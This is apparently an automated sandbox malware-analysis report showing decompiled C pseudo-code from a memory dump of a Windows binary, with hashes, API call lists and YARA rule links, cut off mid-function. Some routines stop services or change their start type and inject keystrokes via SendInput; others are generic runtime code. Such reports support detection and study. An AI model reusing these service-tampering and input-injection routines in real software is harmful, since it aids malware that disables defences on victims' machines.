Opcode ID: 8af8852d8398795458f25c13f62bd9adb938aefc394f05bca2e77cfbe63b1337
Instruction ID: 57d3b8f3912e80867dbd5bea15d3c0571bce0196d8e9b81a223875e0514adfa6
Opcode Fuzzy Hash: 8af8852d8398795458f25c13f62bd9adb938aefc394f05bca2e77cfbe63b1337
Instruction Fuzzy Hash: 9791C2B1E002569AEF208E66C841AAFBBA5FF09754F14066BE805E7281D739DC418769

Uniqueness

Uniqueness Score: -1.00%

Function 0043E9CE, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0043E9CE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = L00441CE2(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E0043E118(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E0043F98C(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xb94f
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E004415D4(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0043698A();
									asm("int3");
									return  *0x46b508;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = L0043DE25(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E004493AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x457410, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E004337C1( &_v528,  *0x46a170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x457350; // 0x40dd8c
									 *0x453474(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46a2a8;
										if(_t228 != 0x46a2a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E004401F5( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E004401F5( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xb94f
												E004401F5( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xb94f
										E004401F5( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E004401F5(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return L0042FD1B(_v8 ^ _t262);
				}
				L47:
			}

0x0043e9d1
0x0043e9d9
0x0043e9e0
0x0043e9e3
0x0043e9e4
0x0043e9e7
0x0043e9eb
0x0043e9ec
0x0043e9ef
0x0043e9ff
0x0043ea0b
0x0043ea22
0x0043ea27
0x0043ea2c
0x0043ea41
0x0043ea44
0x0043ea44
0x0043ea47
0x0043ea4d
0x0043ea56
0x0043ea58
0x0043ea5b
0x0043ea62
0x0043ea65
0x0043ea6b
0x00000000
0x00000000
0x0043ea6d
0x0043ea71
0x0043ea9a
0x0043ea9a
0x0043ea73
0x0043ea73
0x0043ea77
0x0043ea7b
0x0043ea82
0x0043ea88
0x00000000
0x0043ea8a
0x0043ea8a
0x0043ea8d
0x0043ea90
0x0043ea98
0x00000000
0x00000000
0x00000000
0x00000000
0x0043ea98
0x0043ea88
0x0043eaa7
0x0043eaa7
0x0043eaa9
0x0043eaaf
0x0043eab5
0x0043eab8
0x0043eab8
0x0043eabb
0x0043eabe
0x0043eabe
0x0043eace
0x0043eadc
0x0043eae1
0x0043eae8
0x0043eaea
0x00000000
0x0043eaf0
0x0043eaf6
0x0043eafc
0x0043eb03
0x0043eb09
0x0043eb0c
0x0043eb12
0x0043eb1f
0x0043eb26
0x0043eb2b
0x0043eb2e
0x0043eb30
0x0043ed89
0x0043ed8f
0x0043ed90
0x0043ed91
0x0043ed92
0x0043ed93
0x0043ed94
0x0043ed99
0x0043ed9f
0x0043eb36
0x0043eb36
0x0043eb44
0x0043eb47
0x0043eb62
0x0043eb69
0x0043eb6f
0x0043eb75
0x0043eb49
0x0043eb49
0x0043eb51
0x00000000
0x0043eb53
0x0043eb53
0x0043eb59
0x0043eb59
0x0043eb51
0x0043eb7c
0x0043eb7f
0x0043ec9c
0x0043ec9f
0x0043ecac
0x0043ecaf
0x0043ecb7
0x0043ecb7
0x0043eca1
0x0043eca7
0x0043eca7
0x0043eb85
0x0043eb85
0x0043eb8b
0x0043eb93
0x0043eb95
0x0043eb98
0x0043eba1
0x0043ebaa
0x0043ebb0
0x0043ebb0
0x0043ebb3
0x0043ebb5
0x00000000
0x00000000
0x0043ebb7
0x0043ebbd
0x0043ebbe
0x0043ebc9
0x0043ebd1
0x0043ebd9
0x0043ebdc
0x0043ebdf
0x0043ebe5
0x0043ebeb
0x0043ebf1
0x0043ebf7
0x0043ebfa
0x00000000
0x00000000
0x0043ebfc
0x0043ec21
0x0043ec21
0x0043ec24
0x0043ec28
0x0043ec41
0x0043ec46
0x0043ec49
0x0043ec4b
0x0043ec51
0x0043ec8c
0x0043ec53
0x0043ec53
0x0043ec58
0x0043ec60
0x0043ec61
0x0043ec61
0x0043ec78
0x0043ec7f
0x0043ec82
0x0043ec87
0x0043ec87
0x0043ec8f
0x0043ec92
0x0043ec92
0x0043ec97
0x00000000
0x0043ec97
0x0043ebfe
0x0043ec00
0x0043ec05
0x0043ec0b
0x0043ec14
0x0043ec1d
0x0043ec1d
0x00000000
0x0043ec00
0x0043ecba
0x0043ecba
0x0043ecbe
0x0043ecc6
0x0043eccc
0x0043eccf
0x0043ecd5
0x0043ecd7
0x0043ed17
0x0043ed1d
0x0043ed24
0x0043ed24
0x0043ed2a
0x0043ed2e
0x00000000
0x0043ed30
0x0043ed30
0x0043ed34
0x0043ed39
0x0043ed3d
0x0043ed42
0x0043ed49
0x0043ed57
0x0043ed5d
0x0043ed60
0x0043ed60
0x0043ed2e
0x0043ed6f
0x0043ed77
0x0043ed80
0x0043ecd9
0x0043ecdf
0x0043ece2
0x0043ece9
0x0043ecfb
0x0043ed02
0x0043ed0f
0x00000000
0x0043ed0f
0x00000000
0x0043ecd7
0x0043eb30
0x0043eaab
0x00000000
0x0043eaab
0x00000000
0x0043eaa9
0x0043eaa2
0x0043eaa4
0x0043eaa4
0x00000000
0x0043ea2e
0x0043ea2e
0x0043ea30
0x0043ea40
0x0043ea40
0x00000000

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

_memcmp.LIBVCRUNTIME ref: 0043EC78
_free.LIBCMT ref: 0043ECE9
_free.LIBCMT ref: 0043ED02
_free.LIBCMT ref: 0043ED34
_free.LIBCMT ref: 0043ED3D
_free.LIBCMT ref: 0043ED49

Strings

C, xrefs: 0043EB36

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 0eafe799368d94de98f69c9e0f393158337638a247233a963793badf309fe3e6
Instruction ID: 95dbb2c384f2b4054f08a0819f6185acf069c750c5e84a8d12f5530653077751
Opcode Fuzzy Hash: 0eafe799368d94de98f69c9e0f393158337638a247233a963793badf309fe3e6
Instruction Fuzzy Hash: 81B12B7590221ADFDB24DF19C884AAEB7B4FF08314F1055AEE94AA7390D735AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004165DD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67
serviceCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004165DD(signed char __ecx, char _a4) {
				signed char _v5;
				void* _t7;
				signed int _t11;
				void* _t17;
				short* _t21;
				signed int _t24;
				int _t25;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_t21 = 0;
				_v5 = __ecx;
				_t7 = OpenSCManagerW(0, 0, 2);
				_t2 =  &_a4; // 0x415d21
				_t24 = _t2;
				_t31 = _t7;
				_t28 = OpenServiceW(_t31, L00401EEB(_t24), 2);
				if(_t28 != 0) {
					_t25 = _t24 | 0xffffffff;
					_t11 = _v5 & 0x000000ff;
					if(_t11 == 0) {
						_push(4);
						goto L8;
					} else {
						_t17 = _t11 - 1;
						if(_t17 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t17 == 1) {
								_push(3);
								L8:
								_pop(_t25);
							}
						}
					}
					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
					CloseServiceHandle(_t31);
					CloseServiceHandle(_t28);
				} else {
					CloseServiceHandle(_t31);
				}
				L00401EF0();
				return _t21;
			}

0x004165e0
0x004165e6
0x004165e8
0x004165ed
0x004165f5
0x004165f5
0x004165f8
0x00416607
0x0041660b
0x0041661a
0x0041661d
0x0041661f
0x00416633
0x00000000
0x00416621
0x00416621
0x00416624
0x0041662f
0x00000000
0x00416626
0x00416629
0x0041662b
0x00416635
0x00416635
0x00416635
0x00416629
0x00416624
0x00416652
0x00416655
0x00416658
0x0041660d
0x0041660e
0x0041660e
0x0041665d
0x0041666a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00415D21,00000000), ref: 004165ED
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00415D21,00000000), ref: 00416601
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 0041660E
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00415D21,00000000), ref: 00416643
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416655
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416658

Strings

!]A, xrefs: 004165F5, 0041665A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID: !]A
API String ID: 493672254-3355486170
Opcode ID: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
Instruction ID: 232e6080decb0fee5e9ead3af30a3f9a58c51749ff75a055db7eec232c54b811
Opcode Fuzzy Hash: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
Instruction Fuzzy Hash: 59016D311443253AD6114F3C9C4EEBF3B6CDB417B2F01032BF925922D2DA68CE4295AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041650F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041650F(char _a4) {
				struct _SERVICE_STATUS _v32;
				void* _t6;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t1 =  &_a4; // 0x415f36
				_t20 = _t6;
				_t19 = OpenServiceW(_t20, L00401EEB(_t1), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				L00401EF0();
				return _t16;
			}

0x0041651a
0x0041651e
0x00416526
0x00416529
0x00416538
0x0041653c
0x0041655d
0x00416560
0x00416563
0x0041653e
0x0041653f
0x0041653f
0x00416568
0x00416575

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415F36,00000000), ref: 0041651E
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415F36,00000000), ref: 00416532
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 0041653F
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00415F36,00000000), ref: 0041654E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416560
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416563

Strings

6_A, xrefs: 00416526, 00416565

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID: 6_A
API String ID: 221034970-3814682797
Opcode ID: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
Instruction ID: da1897a772ed1359c9b05f965c8e3084c4a483461664f911434d7ad5a9b28404
Opcode Fuzzy Hash: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
Instruction Fuzzy Hash: 90F0C2715403187BD221AF65EC49DBF3B6CDB45B92F00002AFE0992196DA38CE4596E9

Uniqueness

Uniqueness Score: -1.00%

Function 004445EF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004445EF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E004401D9(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return L0042FD1B(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00430BA0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00442680(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00430BA0(_t101);
									goto L36;
								}
								_t62 = E00442680(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00430BA0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0043F98C(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00450810();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00442680(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0043F98C(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00450810();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x004445f4
0x004445f5
0x004445f6
0x004445fd
0x00444601
0x00444602
0x00444608
0x0044460e
0x00444614
0x00444617
0x00444617
0x0044461a
0x0044461c
0x0044461c
0x0044461a
0x0044461e
0x00444623
0x0044462a
0x0044462d
0x0044462d
0x00444649
0x0044464f
0x00444654
0x004447e7
0x004447fa
0x0044465a
0x0044465a
0x0044465d
0x00444662
0x00444666
0x004446ba
0x004446ba
0x004446bc
0x004446be
0x004447dc
0x004447dc
0x004447de
0x004447df
0x00000000
0x004447e5
0x004446cf
0x004446d5
0x004446d7
0x00000000
0x00000000
0x004446dd
0x004446ef
0x004446f4
0x004446f8
0x00000000
0x00000000
0x00444705
0x0044473f
0x00444742
0x00444745
0x00444747
0x00444749
0x0044474b
0x00444797
0x00444797
0x00444799
0x00444799
0x0044479b
0x004447d5
0x004447d6
0x00000000
0x004447db
0x004447af
0x004447b4
0x004447b6
0x00000000
0x00000000
0x004447ba
0x004447bb
0x004447bc
0x004447bf
0x004447fb
0x004447fe
0x004447c1
0x004447c1
0x004447c2
0x004447c2
0x004447cf
0x004447d1
0x004447d3
0x00444804
0x00000000
0x00000000
0x00000000
0x00000000
0x004447d3
0x0044474d
0x00444750
0x00444752
0x00444754
0x00444756
0x00444759
0x0044475e
0x00444779
0x0044477b
0x00444785
0x00444787
0x00444788
0x0044478a
0x00000000
0x00000000
0x0044478c
0x00444792
0x00444792
0x00000000
0x00444792
0x00444760
0x00444762
0x00444766
0x0044476b
0x0044476d
0x0044476f
0x00000000
0x00000000
0x00444771
0x00000000
0x00444771
0x00444707
0x0044470c
0x00000000
0x00000000
0x00444712
0x00444714
0x00000000
0x00000000
0x0044472b
0x00444730
0x00444734
0x00000000
0x00000000
0x00000000
0x0044473a
0x0044466d
0x0044466f
0x00444671
0x00444679
0x00444698
0x0044469a
0x004446a4
0x004446a6
0x004446a7
0x004446a9
0x00000000
0x00000000
0x004446af
0x004446b5
0x004446b5
0x00000000
0x004446b5
0x0044467d
0x00444681
0x00444686
0x0044468a
0x00000000
0x00000000
0x00444690
0x00000000
0x00444690

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 00444649
__alloca_probe_16.LIBCMT ref: 00444681
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 004446CF
__alloca_probe_16.LIBCMT ref: 00444766
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004447C9
__freea.LIBCMT ref: 004447D6

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

__freea.LIBCMT ref: 004447DF
__freea.LIBCMT ref: 00444804

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: c81fc079ffe6e17846da30cde59962139594545343a8c84db9ba8a3c8526ac09
Instruction ID: 38c3e806ad7a3790cd52a8b2f1174a250ebfd45b4bb0c692cfbb473d4bf5d511
Opcode Fuzzy Hash: c81fc079ffe6e17846da30cde59962139594545343a8c84db9ba8a3c8526ac09
Instruction Fuzzy Hash: E951E3B2610216AFFB258F60CC41FAB77A9EB85754F15462BFC04D7240EB3CDC5186A8

Uniqueness

Uniqueness Score: -1.00%

Function 00415288, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
SendInput.USER32(00000001,?,0000001C,?), ref: 00415376

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00444B6E, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00444B6E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
